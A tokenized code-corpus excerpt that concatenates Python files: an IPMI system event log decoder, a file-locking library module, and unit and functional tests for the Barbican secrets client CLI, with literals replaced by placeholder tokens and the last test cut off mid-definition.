<EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:3> : <EOL> action = ( eventdata [ <NUM_LIT:1> ] & <NUM_LIT> ) >> <NUM_LIT:4> <EOL> return auxlog_actions . get ( action , '<STR_LIT>' ) <EOL> elif offset == <NUM_LIT:4> : <EOL> sysactions = [ ] <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:5> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:4> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:3> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:2> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> << <NUM_LIT:1> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> : <EOL> sysactions . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT:U+002C>' . join ( sysactions ) <EOL> elif offset == <NUM_LIT:5> : <EOL> if eventdata [ <NUM_LIT:1> ] & <NUM_LIT> : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:0> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] , eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:7> : <EOL> return restart_causes . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT> : <EOL> return '<STR_LIT>' . format ( slot_types . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) , <EOL> eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> phase = eventdata [ <NUM_LIT:1> ] & <NUM_LIT> <EOL> return watchdog_boot_phases . get ( phase , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:4> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif offset == <NUM_LIT:5> : <EOL> islogical = ( eventdata [ <NUM_LIT:1> ] & <NUM_LIT> ) <EOL> if islogical : <EOL> if eventdata [ <NUM_LIT:2> ] in sdr . fru : <EOL> return sdr . fru [ eventdata [ <NUM_LIT:2> ] ] . fru_name <EOL> else : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:3> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> return version_changes . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> cause = ( eventdata [ <NUM_LIT:1> ] & <NUM_LIT> ) >> <NUM_LIT:4> <EOL> cause = fru_states . get ( cause , '<STR_LIT>' ) <EOL> oldstate = eventdata [ <NUM_LIT:1> ] & <NUM_LIT> <EOL> if oldstate != offset : <EOL> try : <EOL> cause += '<STR_LIT>' . format ( <EOL> ipmiconst . sensor_type_offsets [ <NUM_LIT> ] [ oldstate ] [ '<STR_LIT>' ] ) <EOL> except KeyError : <EOL> pass <EOL> def _fix_sel_time ( records , ipmicmd ) : <EOL> timefetched = False <EOL> rsp = None <EOL> while not timefetched : <EOL> try : <EOL> rsp = ipmicmd . xraw_command ( netfn = <NUM_LIT> , command = <NUM_LIT> ) <EOL> timefetched = True <EOL> except pygexc . IpmiException as pi : <EOL> if pi . ipmicode == <NUM_LIT> : <EOL> continue <EOL> raise <EOL> nowtime = struct . unpack_from ( '<STR_LIT>' , rsp [ '<STR_LIT:data>' ] ) [ <NUM_LIT:0> ] <EOL> correctednowtime = nowtime <EOL> if nowtime < <NUM_LIT> : <EOL> correctearly = True <EOL> inpreinit = True <EOL> else : <EOL> correctearly = False <EOL> inpreinit = False <EOL> newtimestamp = <NUM_LIT:0> <EOL> lasttimestamp = None <EOL> trimindexes = [ ] <EOL> for index in reversed ( xrange ( len ( records ) ) ) : <EOL> record = records [ index ] <EOL> if '<STR_LIT>' not in record or record [ '<STR_LIT>' ] == <NUM_LIT> : <EOL> continue <EOL> if ( '<STR_LIT>' in record and record [ '<STR_LIT>' ] == '<STR_LIT>' and <EOL> record [ '<STR_LIT>' ] == '<STR_LIT>' ) : <EOL> newtimestamp = record [ '<STR_LIT>' ] <EOL> trimindexes . append ( index ) <EOL> elif ( '<STR_LIT>' in record and record [ '<STR_LIT>' ] == '<STR_LIT>' and <EOL> record [ '<STR_LIT>' ] == '<STR_LIT>' ) : <EOL> if newtimestamp : <EOL> if record [ '<STR_LIT>' ] < <NUM_LIT> : <EOL> correctearly = True <EOL> nowtime = correctednowtime <EOL> correctednowtime += newtimestamp - record [ '<STR_LIT>' ] <EOL> newtimestamp = <NUM_LIT:0> <EOL> trimindexes . append ( index ) <EOL> else : <EOL> newtimestamp = <NUM_LIT:0> <EOL> if record [ '<STR_LIT>' ] < <NUM_LIT> : <EOL> if not correctearly : <EOL> correctednowtime = nowtime <EOL> continue <EOL> if ( lasttimestamp is not None and <EOL> record [ '<STR_LIT>' ] > lasttimestamp ) : <EOL> correctearly = False <EOL> correctednowtime = nowtime <EOL> continue <EOL> inpreinit = True <EOL> lasttimestamp = record [ '<STR_LIT>' ] <EOL> age = correctednowtime - record [ '<STR_LIT>' ] <EOL> record [ '<STR_LIT>' ] = time . strftime ( <EOL> '<STR_LIT>' , time . localtime ( time . time ( ) - age ) ) <EOL> else : <EOL> if inpreinit : <EOL> inpreinit = False <EOL> correctednowtime = nowtime <EOL> correctearly = False <EOL> if correctednowtime < <NUM_LIT> : <EOL> record [ '<STR_LIT>' ] = time . strftime ( <EOL> '<STR_LIT>' , time . localtime ( <EOL> record [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> age = correctednowtime - record [ '<STR_LIT>' ] <EOL> record [ '<STR_LIT>' ] = time . strftime ( <EOL> '<STR_LIT>' , time . localtime ( <EOL> time . time ( ) - age ) ) <EOL> for index in trimindexes : <EOL> del records [ index ] <EOL> class EventHandler ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , sdr , ipmicmd ) : <EOL> self . _sdr = sdr <EOL> self . _ipmicmd = ipmicmd <EOL> def _populate_event ( self , deassertion , event , event_data , event_type , <EOL> sensor_type , sensorid ) : <EOL> event [ '<STR_LIT>' ] = sensorid <EOL> try : <EOL> event [ '<STR_LIT>' ] = self . _sdr . sensors [ sensorid ] . name <EOL> except KeyError : <EOL> if sensorid == <NUM_LIT:0> : <EOL> event [ '<STR_LIT>' ] = None <EOL> else : <EOL> event [ '<STR_LIT>' ] = '<STR_LIT>' . format ( sensorid ) <EOL> event [ '<STR_LIT>' ] = deassertion <EOL> event [ '<STR_LIT>' ] = event_data <EOL> byte2type = ( event_data [ <NUM_LIT:0> ] & <NUM_LIT> ) >> <NUM_LIT:6> <EOL> byte3type = ( event_data [ <NUM_LIT:0> ] & <NUM_LIT> ) >> <NUM_LIT:4> <EOL> if byte2type == <NUM_LIT:1> : <EOL> event [ '<STR_LIT>' ] = event_data [ <NUM_LIT:1> ] <EOL> evtoffset = event_data [ <NUM_LIT:0> ] & <NUM_LIT> <EOL> event [ '<STR_LIT>' ] = event_type <EOL> if event_type <= <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = sensor_type <EOL> event [ '<STR_LIT>' ] = '<STR_LIT>' . format ( event_type , evtoffset ) <EOL> event [ '<STR_LIT>' ] = ipmiconst . sensor_type_codes . get ( <EOL> sensor_type , '<STR_LIT>' ) <EOL> evreading = ipmiconst . generic_type_offsets . get ( <EOL> event_type , { } ) . get ( evtoffset , { } ) <EOL> if event [ '<STR_LIT>' ] : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> else : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> elif event_type == <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = sensor_type <EOL> event [ '<STR_LIT>' ] = '<STR_LIT>' . format ( event_type , evtoffset ) <EOL> event [ '<STR_LIT>' ] = ipmiconst . sensor_type_codes . get ( <EOL> sensor_type , '<STR_LIT>' ) <EOL> evreading = ipmiconst . sensor_type_offsets . get ( <EOL> sensor_type , { } ) . get ( evtoffset , { } ) <EOL> if event [ '<STR_LIT>' ] : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> else : <EOL> event [ '<STR_LIT>' ] = evreading . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> event [ '<STR_LIT>' ] = evreading . get ( <EOL> '<STR_LIT>' , pygconst . Health . Ok ) <EOL> if event_type == <NUM_LIT:1> : <EOL> if byte3type == <NUM_LIT:1> : <EOL> event [ '<STR_LIT>' ] = event_data [ <NUM_LIT:2> ] <EOL> if <NUM_LIT:3> in ( byte2type , byte3type ) or event_type == <NUM_LIT> : <EOL> additionaldata = decode_eventdata ( <EOL> sensor_type , evtoffset , event_data , self . _sdr ) <EOL> if additionaldata : <EOL> event [ '<STR_LIT>' ] = additionaldata <EOL> def decode_pet ( self , specifictrap , petdata ) : <EOL> if isinstance ( specifictrap , int ) : <EOL> specifictrap = struct . unpack ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , specifictrap ) ) <EOL> if len ( specifictrap ) != <NUM_LIT:4> : <EOL> raise pygexc . InvalidParameterValue ( <EOL> '<STR_LIT>' ) <EOL> specifictrap = bytearray ( specifictrap ) <EOL> sensor_type = specifictrap [ <NUM_LIT:1> ] <EOL> event_type = specifictrap [ <NUM_LIT:2> ] <EOL> deassertion = ( specifictrap [ <NUM_LIT:3> ] & <NUM_LIT> ) == <NUM_LIT> <EOL> sensorid = petdata [ <NUM_LIT> ] <EOL> event_data = petdata [ <NUM_LIT> : <NUM_LIT> ] <EOL> event = { } <EOL> seqnum = struct . unpack_from ( '<STR_LIT>' , buffer ( petdata [ <NUM_LIT:16> : <NUM_LIT> ] ) ) [ <NUM_LIT:0> ] <EOL> ltimestamp = struct . unpack_from ( '<STR_LIT>' , buffer ( petdata [ <NUM_LIT> : <NUM_LIT> ] ) ) [ <NUM_LIT:0> ] <EOL> petack = bytearray ( struct . pack ( '<STR_LIT>' , seqnum , ltimestamp , <EOL> petdata [ <NUM_LIT> ] , petdata [ <NUM_LIT> ] , sensorid , <EOL> * event_data ) ) <EOL> try : <EOL> self . _ipmicmd . xraw_command ( netfn = <NUM_LIT:4> , command = <NUM_LIT> , data = petack ) <EOL> except pygexc . IpmiException : <EOL> pass <EOL> self . _populate_event ( deassertion , event , event_data , event_type , <EOL> sensor_type , sensorid ) <EOL> event [ '<STR_LIT>' ] = ltimestamp <EOL> _fix_sel_time ( ( event , ) , self . _ipmicmd ) <EOL> return event <EOL> def _decode_standard_event ( self , eventdata , event ) : <EOL> if eventdata [ <NUM_LIT:2> ] not in ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> raise pygexc . PyghmiException ( <EOL> '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) ) <EOL> sensor_type = eventdata [ <NUM_LIT:3> ] <EOL> sensorid = eventdata [ <NUM_LIT:4> ] <EOL> event_data = eventdata [ <NUM_LIT:6> : ] <EOL> deassertion = ( eventdata [ <NUM_LIT:5> ] & <NUM_LIT> == <NUM_LIT> ) <EOL> event_type = eventdata [ <NUM_LIT:5> ] & <NUM_LIT> <EOL> self . _populate_event ( deassertion , event , event_data , event_type , <EOL> sensor_type , sensorid ) <EOL> def _sel_decode ( self , origselentry ) : <EOL> selentry = bytearray ( origselentry ) <EOL> event = { } <EOL> event [ '<STR_LIT>' ] = struct . unpack_from ( '<STR_LIT>' , origselentry [ : <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> if selentry [ <NUM_LIT:2> ] == <NUM_LIT:2> or ( <NUM_LIT> <= selentry [ <NUM_LIT:2> ] <= <NUM_LIT> ) : <EOL> event [ '<STR_LIT>' ] = struct . unpack_from ( '<STR_LIT>' , buffer ( selentry [ <NUM_LIT:3> : <NUM_LIT:7> ] ) <EOL> ) [ <NUM_LIT:0> ] <EOL> if selentry [ <NUM_LIT:2> ] == <NUM_LIT:2> : <EOL> self . _decode_standard_event ( selentry [ <NUM_LIT:7> : ] , event ) <EOL> elif <NUM_LIT> <= selentry [ <NUM_LIT:2> ] <= <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = selentry [ <NUM_LIT:7> : <NUM_LIT:10> ] <EOL> event [ '<STR_LIT>' ] = selentry [ <NUM_LIT:10> : ] <EOL> elif selentry [ <NUM_LIT:2> ] >= <NUM_LIT> : <EOL> event [ '<STR_LIT>' ] = selentry [ <NUM_LIT:3> : ] <EOL> self . _ipmicmd . _oem . process_event ( event , self . _ipmicmd , selentry ) <EOL> if '<STR_LIT>' in event : <EOL> del event [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in event : <EOL> del event [ '<STR_LIT>' ] <EOL> return event <EOL> def _fetch_entries ( self , ipmicmd , startat , targetlist , rsvid = <NUM_LIT:0> ) : <EOL> curr = startat <EOL> endat = curr <EOL> while curr != <NUM_LIT> : <EOL> endat = curr <EOL> reqdata = bytearray ( struct . pack ( '<STR_LIT>' , rsvid , curr , <NUM_LIT> ) ) <EOL> try : <EOL> rsp = ipmicmd . xraw_command ( <EOL> netfn = <NUM_LIT> , command = <NUM_LIT> , data = reqdata ) <EOL> except pygexc . IpmiException as pi : <EOL> if pi . ipmicode == <NUM_LIT> : <EOL> break <EOL> curr = struct . unpack_from ( '<STR_LIT>' , buffer ( rsp [ '<STR_LIT:data>' ] [ : <NUM_LIT:2> ] ) ) [ <NUM_LIT:0> ] <EOL> targetlist . append ( self . _sel_decode ( rsp [ '<STR_LIT:data>' ] [ <NUM_LIT:2> : ] ) ) <EOL> return endat <EOL> def fetch_sel ( self , ipmicmd , clear = False ) : <EOL> """<STR_LIT>""" <EOL> records = [ ] <EOL> endat = self . _fetch_entries ( ipmicmd , <NUM_LIT:0> , records ) <EOL> if clear and records : <EOL> rsp = ipmicmd . xraw_command ( netfn = <NUM_LIT> , command = <NUM_LIT> ) <EOL> rsvid = struct . unpack_from ( '<STR_LIT>' , rsp [ '<STR_LIT:data>' ] ) [ <NUM_LIT:0> ] <EOL> del records [ - <NUM_LIT:1> ] <EOL> self . _fetch_entries ( ipmicmd , endat , records , rsvid ) <EOL> clrdata = bytearray ( struct . pack ( '<STR_LIT>' , rsvid , <NUM_LIT> ) ) <EOL> ipmicmd . xraw_command ( netfn = <NUM_LIT> , command = <NUM_LIT> , data = clrdata ) <EOL> _fix_sel_time ( records , ipmicmd ) <EOL> return records </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import functools <EOL> import os <EOL> import socket <EOL> import threading <EOL> import warnings <EOL> if not hasattr ( threading , "<STR_LIT>" ) : <EOL> threading . current_thread = threading . currentThread <EOL> if not hasattr ( threading . Thread , "<STR_LIT>" ) : <EOL> threading . Thread . get_name = threading . Thread . getName <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class LockError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class LockTimeout ( LockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AlreadyLocked ( LockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class LockFailed ( LockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnlockError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class NotLocked ( UnlockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class NotMyLock ( UnlockError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class _SharedBase ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> def acquire ( self , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def release ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire ( ) <EOL> return self <EOL> def __exit__ ( self , * _exc ) : <EOL> """<STR_LIT>""" <EOL> self . release ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . path ) <EOL> class LockBase ( _SharedBase ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path , threaded = True , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> super ( LockBase , self ) . __init__ ( path ) <EOL> self . lock_file = os . path . abspath ( path ) + "<STR_LIT>" <EOL> self . hostname = socket . gethostname ( ) <EOL> self . pid = os . getpid ( ) <EOL> if threaded : <EOL> t = threading . current_thread ( ) <EOL> ident = getattr ( t , "<STR_LIT>" , hash ( t ) ) <EOL> self . tname = "<STR_LIT>" % ( ident & <NUM_LIT> ) <EOL> else : <EOL> self . tname = "<STR_LIT>" <EOL> dirname = os . path . dirname ( self . lock_file ) <EOL> self . unique_name = os . path . join ( dirname , <EOL> "<STR_LIT>" % ( self . hostname , <EOL> self . tname , <EOL> self . pid , <EOL> hash ( self . path ) ) ) <EOL> self . timeout = timeout <EOL> def is_locked ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def i_am_locking ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def break_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( "<STR_LIT>" ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . unique_name , <EOL> self . path ) <EOL> def _fl_helper ( cls , mod , * args , ** kwds ) : <EOL> warnings . warn ( "<STR_LIT>" % mod , <EOL> DeprecationWarning , stacklevel = <NUM_LIT:2> ) <EOL> if not isinstance ( args [ <NUM_LIT:0> ] , str ) : <EOL> args = args [ <NUM_LIT:1> : ] <EOL> if len ( args ) == <NUM_LIT:1> and not kwds : <EOL> kwds [ "<STR_LIT>" ] = True <EOL> return cls ( * args , ** kwds ) <EOL> def LinkFileLock ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> from . import linklockfile <EOL> return _fl_helper ( linklockfile . LinkLockFile , "<STR_LIT>" , <EOL> * args , ** kwds ) <EOL> def MkdirFileLock ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> from . import mkdirlockfile <EOL> return _fl_helper ( mkdirlockfile . MkdirLockFile , "<STR_LIT>" , <EOL> * args , ** kwds ) <EOL> def SQLiteFileLock ( * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> from . import sqlitelockfile <EOL> return _fl_helper ( sqlitelockfile . SQLiteLockFile , "<STR_LIT>" , <EOL> * args , ** kwds ) <EOL> def locked ( path , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> def decor ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> lock = FileLock ( path , timeout = timeout ) <EOL> lock . acquire ( ) <EOL> try : <EOL> return func ( * args , ** kwargs ) <EOL> finally : <EOL> lock . release ( ) <EOL> return wrapper <EOL> return decor <EOL> if hasattr ( os , "<STR_LIT>" ) : <EOL> from . import linklockfile as _llf <EOL> LockFile = _llf . LinkLockFile <EOL> else : <EOL> from . import mkdirlockfile as _mlf <EOL> LockFile = _mlf . MkdirLockFile <EOL> FileLock = LockFile </s>
<s> import six <EOL> from barbicanclient import client <EOL> from barbicanclient import barbican as barb <EOL> from barbicanclient . tests import keystone_client_fixtures <EOL> from barbicanclient . tests import test_client <EOL> from barbicanclient . barbican import Barbican <EOL> class WhenTestingBarbicanCLI ( test_client . BaseEntityResource ) : <EOL> def setUp ( self ) : <EOL> self . _setUp ( '<STR_LIT>' ) <EOL> self . captured_stdout = six . StringIO ( ) <EOL> self . captured_stderr = six . StringIO ( ) <EOL> self . barbican = Barbican ( <EOL> stdout = self . captured_stdout , <EOL> stderr = self . captured_stderr <EOL> ) <EOL> self . parser = self . barbican . build_option_parser ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def assert_client_raises ( self , args , message ) : <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> e = self . assertRaises ( <EOL> Exception , self . barbican . create_client , argv <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def create_and_assert_client ( self , args ) : <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> client = self . barbican . create_client ( argv ) <EOL> self . assertIsNotNone ( client ) <EOL> return client <EOL> def test_should_show_usage_with_help_flag ( self ) : <EOL> e = self . assertRaises ( SystemExit , self . barbican . run , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , e . code ) <EOL> self . assertIn ( '<STR_LIT>' , self . captured_stdout . getvalue ( ) ) <EOL> def test_should_show_usage_with_no_args ( self ) : <EOL> exit_code = self . barbican . run ( [ ] ) <EOL> self . assertEquals ( <NUM_LIT:1> , exit_code ) <EOL> self . assertIn ( '<STR_LIT>' , self . captured_stderr . getvalue ( ) ) <EOL> def test_should_error_if_noauth_and_authurl_both_specified ( self ) : <EOL> args = "<STR_LIT>" <EOL> message = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_client_raises ( args , message ) <EOL> def _expect_error_with_invalid_noauth_args ( self , args ) : <EOL> expected_err_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_client_raises ( args , expected_err_msg ) <EOL> def test_should_error_if_noauth_and_missing_endpoint_tenantid_args ( self ) : <EOL> self . _expect_error_with_invalid_noauth_args ( "<STR_LIT>" ) <EOL> self . _expect_error_with_invalid_noauth_args ( <EOL> "<STR_LIT>" ) <EOL> self . _expect_error_with_invalid_noauth_args ( <EOL> "<STR_LIT>" ) <EOL> self . _expect_error_with_invalid_noauth_args ( <EOL> "<STR_LIT>" ) <EOL> def test_should_succeed_if_noauth_with_valid_args_specified ( self ) : <EOL> args = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . endpoint , self . project_id ) <EOL> ) <EOL> list_secrets_url = '<STR_LIT>' . format ( self . endpoint ) <EOL> self . responses . get ( list_secrets_url , json = { "<STR_LIT>" : [ ] , "<STR_LIT>" : <NUM_LIT:0> } ) <EOL> client = self . create_and_assert_client ( args ) <EOL> secret_list = client . secrets . list ( ) <EOL> self . assertTrue ( self . responses . _adapter . called ) <EOL> self . assertEqual ( <NUM_LIT:1> , self . responses . _adapter . call_count ) <EOL> self . assertEqual ( [ ] , secret_list ) <EOL> def test_should_error_if_required_keystone_auth_arguments_are_missing ( <EOL> self ) : <EOL> expected_error_msg = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assert_client_raises ( <EOL> '<STR_LIT>' , <EOL> expected_error_msg ) <EOL> self . assert_client_raises ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> expected_error_msg <EOL> ) <EOL> def test_check_auth_arguments_v2 ( self ) : <EOL> args = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> api_version = argv . os_identity_api_version <EOL> barbican = Barbican ( ) <EOL> response = barbican . check_auth_arguments ( argv , api_version ) <EOL> self . assertEqual ( True , response ) <EOL> def test_should_fail_check_auth_arguments_v2 ( self ) : <EOL> args = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> message = '<STR_LIT>' <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> api_version = argv . os_identity_api_version <EOL> e = self . assertRaises ( <EOL> Exception , <EOL> self . barbican . check_auth_arguments , <EOL> argv , <EOL> api_version , <EOL> True <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def test_should_fail_create_client_with_no_auth_url ( self ) : <EOL> args = '<STR_LIT>' <EOL> message = '<STR_LIT>' <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> e = self . assertRaises ( <EOL> Exception , self . barbican . create_client , argv <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def test_should_fail_missing_credentials ( self ) : <EOL> message = '<STR_LIT>' <EOL> args = '<STR_LIT>' <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> e = self . assertRaises ( <EOL> Exception , self . barbican . create_client , argv <EOL> ) <EOL> self . assertIn ( message , str ( e ) ) <EOL> def test_main ( self ) : <EOL> args = '<STR_LIT>' <EOL> response = barb . main ( args ) <EOL> self . assertEqual ( <NUM_LIT:1> , response ) <EOL> def test_default_endpoint_filter_kwargs_set_correctly ( self ) : <EOL> auth_args = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> argv , remainder = self . parser . parse_known_args ( auth_args . split ( ) ) <EOL> barbican_client = self . barbican . create_client ( argv ) <EOL> httpclient = barbican_client . secrets . _api <EOL> self . assertEqual ( client . _DEFAULT_SERVICE_INTERFACE , <EOL> httpclient . interface ) <EOL> self . assertEqual ( client . _DEFAULT_SERVICE_TYPE , httpclient . service_type ) <EOL> self . assertEqual ( client . _DEFAULT_API_VERSION , httpclient . version ) <EOL> self . assertIsNone ( httpclient . service_name ) <EOL> def test_endpoint_filter_kwargs_set_correctly ( self ) : <EOL> from testtools . content import text_content <EOL> auth_args = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> endpoint_filter_args = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> args = auth_args + '<STR_LIT:U+0020>' + endpoint_filter_args <EOL> argv , remainder = self . parser . parse_known_args ( args . split ( ) ) <EOL> barbican_client = self . barbican . create_client ( argv ) <EOL> httpclient = barbican_client . secrets . _api <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . interface ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . service_type ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . service_name ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . region_name ) <EOL> self . assertEqual ( '<STR_LIT>' , httpclient . version ) <EOL> class TestBarbicanWithKeystonePasswordAuth ( <EOL> keystone_client_fixtures . KeystoneClientFixture ) : <EOL> def setUp ( self ) : <EOL> super ( TestBarbicanWithKeystonePasswordAuth , self ) . setUp ( ) <EOL> self . test_arguments = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> class TestBarbicanWithKeystoneTokenAuth ( <EOL> keystone_client_fixtures . KeystoneClientFixture ) : <EOL> def setUp ( self ) : <EOL> super ( TestBarbicanWithKeystoneTokenAuth , self ) . setUp ( ) <EOL> self . test_arguments = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } </s>
<s> from testtools import testcase <EOL> from functionaltests import utils <EOL> from functionaltests . client import base <EOL> from functionaltests . common import cleanup <EOL> order_create_key_data = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> order_create_nones_data = { <EOL> '<STR_LIT:type>' : None , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:name>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> } <EOL> @ utils . parameterized_test_case <EOL> class OrdersTestCase ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( OrdersTestCase , self ) . setUp ( ) <EOL> self . cleanup = cleanup . CleanUp ( self . barbicanclient ) <EOL> def tearDown ( self ) : <EOL> self . cleanup . delete_all_entities ( ) <EOL> super ( OrdersTestCase , self ) . tearDown ( ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def test_create_order_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> order = self . barbicanclient . orders . create_key ( <EOL> ** order_create_key_data ) <EOL> order_ref = self . cleanup . add_entity ( order ) <EOL> self . assertIsNotNone ( order_ref ) <EOL> @ testcase . attr ( '<STR_LIT>' ) <EOL> def 